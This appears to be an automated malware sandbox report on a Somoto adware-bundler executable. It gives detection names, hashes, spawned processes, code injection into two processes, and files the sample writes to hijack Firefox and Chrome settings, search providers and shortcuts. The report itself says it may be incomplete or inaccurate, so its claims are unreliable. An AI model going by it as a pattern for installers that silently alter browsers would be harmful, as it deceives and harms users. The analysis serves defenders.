Application.Bundler.Somoto.I (BitDefender), not-a-virus:Downloader.NSIS.Agent.go (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), Adware.Somoto.17 (DrWeb), Trojan.Gen.2 (Symantec), Application.Bundler.Somoto (FSecure), AdInstaller.Somoto (AVG), Win32:PUP-gen [PUP] (Avast), TROJ_GEN.R047C0VI314 (TrendMicro), Application.Bundler.Somoto.I (AdAware), SearchProtectToolbar_pcap.YR, mzpefinder_pcap_file.YR, WormAutoItGen.YR, SearchProtectToolbar.YR (Lavasoft MAS)Behaviour: Trojan, Worm, Installer, PUP, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 574d51bb688892ce2c77d046dcd15567
SHA1: 82433b7f3926ddfd536f92bf0f1da7f36fdd1633
SHA256: 714e6fdcf52223db21b081cc4c8b47c65865a05d67c2f1e11c1bb809efede1c5
SSDeep: 3072:h22ihA0m3BJf0vkqbOgMyCw0eJknf06kIIQ40yLeROBiKUJl:CA0m3T0vk7mJv61IQR7OBinl
Size: 166640 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2010-12-17 11:14:12
Analyzed on: Windows7Ada SP1 64-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Application creates the following process(es):
BaofengUpdate.exe:3600
BaofengUpdate.exe:3212
D79A.tmp:2264
XTab_v4.0.exe:3152
smt_mystartsearch.exe:3356
ProtectService.exe:3120
ProtectService.exe:3188
Setup.exe:4008
Setup.exe:468
TPAutoConnSvc.exe:1844
appshat.exe:4072
biclient.exe:2452
unInstpw64.exe:2004
11a9fc6b-cfbc-4d3c-943b-7e1062933d01-4.exe:3456
powershell.exe:976
powershell.exe:1020
powershell.exe:3596
appshat_generic.exe:108
HPNotify.exe:3132
gentray.exe:2824
gentray.exe:3260
gentray.exe:3080
gentray.exe:1556
genieo_setup.gen:3380
cmdshell.exe:3084
genieo_setup.exe:1552
STab_Down_6.0.6.6.exe:3216
App Lid-codedownloader.exe:3672
App Lid-codedownloader.exe:3264
converter.exe:4068
regsvr32.exe:3688
regsvr32.exe:3720
regsvr32.exe:3404
webplayer_installer.exe:716
framework_setup.gen:1048
InstallGenieo.exe:4052
InstallGenieo.exe:1660
cscript.exe:3120
MsiExec.exe:3588
MsiExec.exe:1612
genupdater.exe:3144
Vlwgfsqfpaz.exe:3296
F365.tmp:3556
firsttime_setup.exe:3488
MSIEXEC.EXE:3852
The Application injects its code into the following process(es):
trayapp_setup.gen:1992
WebPlayer.exe:2984
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process BaofengUpdate.exe:3600 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\es\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\prefs.js (591 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\js\lib\jquery.autocomplete.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\bk_shadow.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\skin\newtab.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\install.rdf (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\zh-TW\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\Thumbs.db (27 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\js\pack\xagainit.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\skin\simple.css (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\skin\googlelogo.png (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\include\tools\urlrequestor.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\modules\properties.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\include\speed_dial.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\bg.png (673 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\checkbox_select.png (783 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\loading_bg.png (159 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\js\module\search.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\ru\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\bg1.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\28A7.tmp (90 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\js\lib\doT.min.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\it-CH\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\skin\default_logo.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\fr\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\button.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\include\tools\popup_image_helper.js (693 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\BFVUpdateM.dll (110 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\min.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions.json (196 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\quick_start.xul (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\modules\settings.js (5 bytes)
C:\Users\Public\Desktop\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\modules\last_tab.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\pl\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\js\module\hotSearch.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\code\code4.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\fr-BE\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\defaults\preferences\preferences.js (379 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\modules\remoterequest.js (2 bytes)
%Program Files% (x86)\Mozilla Firefox\browser\searchplugins\mystartsearch.xml (565 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\checked.png (222 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\en\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\uninstallDlg2.xml (19 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\unchecked.png (135 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Web Data (1518 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\js\module\stat.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\tr\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\skin\loading.gif (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\skin\style.css (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\it\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\js\pack\ga.js (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\js\lib\jquery-2.1.0.min.js (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\zh-CN\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\code\code3.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\code\code1.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\code\Thumbs.db (42 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\skin\google_trends.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions.ini (480 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\close.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\ru-MO\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\modules\restoreprefs.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\code\code5.jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\include\tools\about_blank_hook.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\include\tools\misc.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal (6322 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\js\module\mostgrid.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\fr-CH\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\modules\addonmanager.js (531 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\skin\icon.png (628 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\422.json (520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\fr-CA\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\en-US\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\es-419\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\quick_start.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\vi\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\pt-BR\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\js\js.js (660 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\code\code6.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\UninstallManager.exe (13122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\MessageBox.xml (3 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\279D.tmp (89 bytes)
C:\Users\Public\Desktop\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\checkbox.png (545 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\js\pack\common.js (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\modules\aes.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome.manifest (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\scrollbar.bmp (37 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\skin\logo.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\fr-LU\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\defaults\preferences\fvd.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\modules\misc.js (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\loading_light.png (139 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\button1.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\index.html (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\code\code2.jpg (4 bytes)
The process BaofengUpdate.exe:3212 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\tmp\wpm_v20.0.0.1714.exe (930 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WebDataJs (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\tmp\STab_Down_6.0.6.6.exe (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\tmp\422.db (220 bytes)
The process D79A.tmp:2264 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SourceApp\lm (128 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsaA3CF.tmp\NSISEncrypt.dll (3412 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsaA3CF.tmp\UserInfo.dll (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ilg (303824 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsaA3CF.tmp\WmiInspector.dll (3137 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsaA3CF.tmp (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsaA3CF.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsaA3CF.tmp\nsExec.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsaA3CF.tmp\inetc.dll (44 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SourceApp\SourceApp.mg.exe (7798 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SourceApp\tlg (41 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsaA3CF.tmp\IpConfig.dll (4254 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SourceApp\mj (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsaA3CF.tmp\nsJSON.dll (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsaA3CF.tmp\ExecDos.dll (13 bytes)
The process XTab_v4.0.exe:3152 makes changes in the file system.
The Application creates and/or writes to the following file(s):
%Program Files% (x86)\XTab\web\img\googlelogo.png (7 bytes)
%Program Files% (x86)\XTab\web\_locales\zh-TW\messages.json (3 bytes)
%Program Files% (x86)\XTab\skin\btn.png (2 bytes)
%Program Files% (x86)\XTab\install.data (68 bytes)
%Program Files% (x86)\XTab\web\_locales\zh-CN\messages.json (3 bytes)
%Program Files% (x86)\XTab\web\_locales\en-US\messages.json (3 bytes)
%Program Files% (x86)\XTab\HPNotify.exe (18027 bytes)
%Program Files% (x86)\XTab\conf (1606 bytes)
%Program Files% (x86)\XTab\web\img\loading.gif (5 bytes)
%Program Files% (x86)\XTab\BrowerWatchFF.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nskDD07.tmp\System.dll (23 bytes)
%Program Files% (x86)\XTab\web\indexIE8.html (1816 bytes)
%Program Files% (x86)\XTab\web\js\library.js (4216 bytes)
%Program Files% (x86)\XTab\web\_locales\pt\messages.json (4 bytes)
%Program Files% (x86)\XTab\web\img\arrow.png (259 bytes)
%Program Files% (x86)\XTab\web\ver.txt (5 bytes)
%Program Files% (x86)\XTab\web\_locales\fr-BE\messages.json (3 bytes)
%Program Files% (x86)\XTab\skin\input_bk.png (2 bytes)
%Program Files% (x86)\XTab\web\_locales\pl\messages.json (3 bytes)
%Program Files% (x86)\XTab\web\_locales\it-IT\messages.json (4 bytes)
%Program Files% (x86)\XTab\skin\conf_back.png (1623 bytes)
%Program Files% (x86)\XTab\web\_locales\fr-CA\messages.json (3 bytes)
%Program Files% (x86)\XTab\web\img\weather\0.png (1 bytes)
%Program Files% (x86)\XTab\skin\btn_apply.png (6 bytes)
%Program Files% (x86)\XTab\skin\conf.xml (8 bytes)
%Program Files% (x86)\XTab\CmdShell.exe (1681 bytes)
%Program Files% (x86)\XTab\web\indexIE.html (1 bytes)
%Program Files% (x86)\XTab\web\_locales\ru-MO\messages.json (4 bytes)
%Program Files% (x86)\XTab\web\js\xagainit-ie8.js (3 bytes)
%Program Files% (x86)\XTab\skin\about_bk.png (1436 bytes)
%Program Files% (x86)\XTab\web\_locales\es-ES\messages.json (3 bytes)
%Program Files% (x86)\XTab\skin\main.xml (4 bytes)
%Program Files% (x86)\XTab\web\img\default_add_logo_hover.png (1 bytes)
%Program Files% (x86)\XTab\BrowserAction.dll (33992 bytes)
%Program Files% (x86)\XTab\skin\radio_2.png (3 bytes)
%Program Files% (x86)\XTab\msvcr110.dll (22156 bytes)
%Program Files% (x86)\XTab\searchProvider.xml (8 bytes)
%Program Files% (x86)\XTab\web\_locales\it-CH\messages.json (3 bytes)
%Program Files% (x86)\XTab\ProtectService.exe (5312 bytes)
%Program Files% (x86)\XTab\web\js\js.js (18 bytes)
%Program Files% (x86)\XTab\ffsearch_toolbar!1.0.0.1025.xpi (14 bytes)
%Program Files% (x86)\XTab\web\img\default_add_logo.png (1 bytes)
%Program Files% (x86)\XTab\skin\logo.png (5 bytes)
%Program Files% (x86)\XTab\web\js\xagainit2.0.js (3 bytes)
%Program Files% (x86)\XTab\web\js\xagainit.js (3 bytes)
%Program Files% (x86)\XTab\web\img\googlelogo2.png (1526 bytes)
%Program Files% (x86)\XTab\web\main.css (19 bytes)
%Program Files% (x86)\XTab\web\_locales\vi-VI\messages.json (4 bytes)
%Program Files% (x86)\XTab\web\_locales\ru\messages.json (4 bytes)
%Program Files% (x86)\XTab\web\img\icon48.png (3 bytes)
%Program Files% (x86)\XTab\skin\close.png (3 bytes)
%Program Files% (x86)\XTab\web\data.html (20 bytes)
%Program Files% (x86)\XTab\web\js\jquery-1.11.0.min.js (4726 bytes)
%Program Files% (x86)\XTab\web\img\logo32.ico (4 bytes)
%Program Files% (x86)\XTab\web\img\icon128.png (9 bytes)
%Program Files% (x86)\XTab\web\js\jquery.autocomplete.js (12 bytes)
%Program Files% (x86)\XTab\uninstall.exe (1343 bytes)
%Program Files% (x86)\XTab\skin\about.png (4 bytes)
%Program Files% (x86)\XTab\BrowerWatchCH.dll (23 bytes)
%Program Files% (x86)\XTab\web\_locales\fr-FR\messages.json (3 bytes)
%Program Files% (x86)\XTab\web\img\icon16.png (628 bytes)
%Program Files% (x86)\XTab\web\_locales\fr-CH\messages.json (3 bytes)
%Program Files% (x86)\XTab\skin\settings.png (5 bytes)
%Program Files% (x86)\XTab\web\img\default_logo.png (5 bytes)
%Program Files% (x86)\XTab\web\_locales\fr-LU\messages.json (3 bytes)
%Program Files% (x86)\XTab\web\js\ga.js (1568 bytes)
%Program Files% (x86)\XTab\web\js\common.js (2 bytes)
%Program Files% (x86)\XTab\web\_locales\tr-TR\messages.json (4 bytes)
%Program Files% (x86)\XTab\SupTab.dll (6812 bytes)
%Program Files% (x86)\XTab\web\js\ie8.js (156 bytes)
%Program Files% (x86)\XTab\IeWatchDog.dll (20 bytes)
%Program Files% (x86)\XTab\web\_locales\pt-BR\messages.json (4 bytes)
%Program Files% (x86)\XTab\web\img\google_trends.png (7 bytes)
%Program Files% (x86)\XTab\web\_locales\es-419\messages.json (3 bytes)
%Program Files% (x86)\XTab\skin\rigth_arrow.png (2 bytes)
%Program Files% (x86)\XTab\msvcp110.dll (17526 bytes)
%Program Files% (x86)\XTab\skin\radio_1.png (3 bytes)
The process smt_mystartsearch.exe:3356 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\422.json (520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\unchecked.png (135 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\conf (83 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\BaofengUpdate.exe (2461 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\uninstallDlg2.xml (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\Thumbs.db (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\checked.png (222 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\code\code4.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\1.zip (197497 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\button1.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\checkbox.png (545 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\button.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\loading_light.png (139 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\bk_shadow.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\code\Thumbs.db (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\bg.png (5064 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\min.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\close.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\BFVUpdateM.dll (3616 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\tmp\STab_Down_6.0.6.6.exe (3616 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\checkbox_select.png (783 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\DataBase (26688 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\2.zip (47952 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\code\code6.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\bg1.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\scrollbar.bmp (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\tmp\422.db (232 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\code\code3.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SH2TVRCI\2[1].zip (70180 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\ffsearch_toolbar!1.0.0.1025.xpi (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\code\code5.jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\loading_bg.png (159 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\code (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\code\code2.jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\tmp\wpm_v20.0.0.1714.exe (16288 bytes)
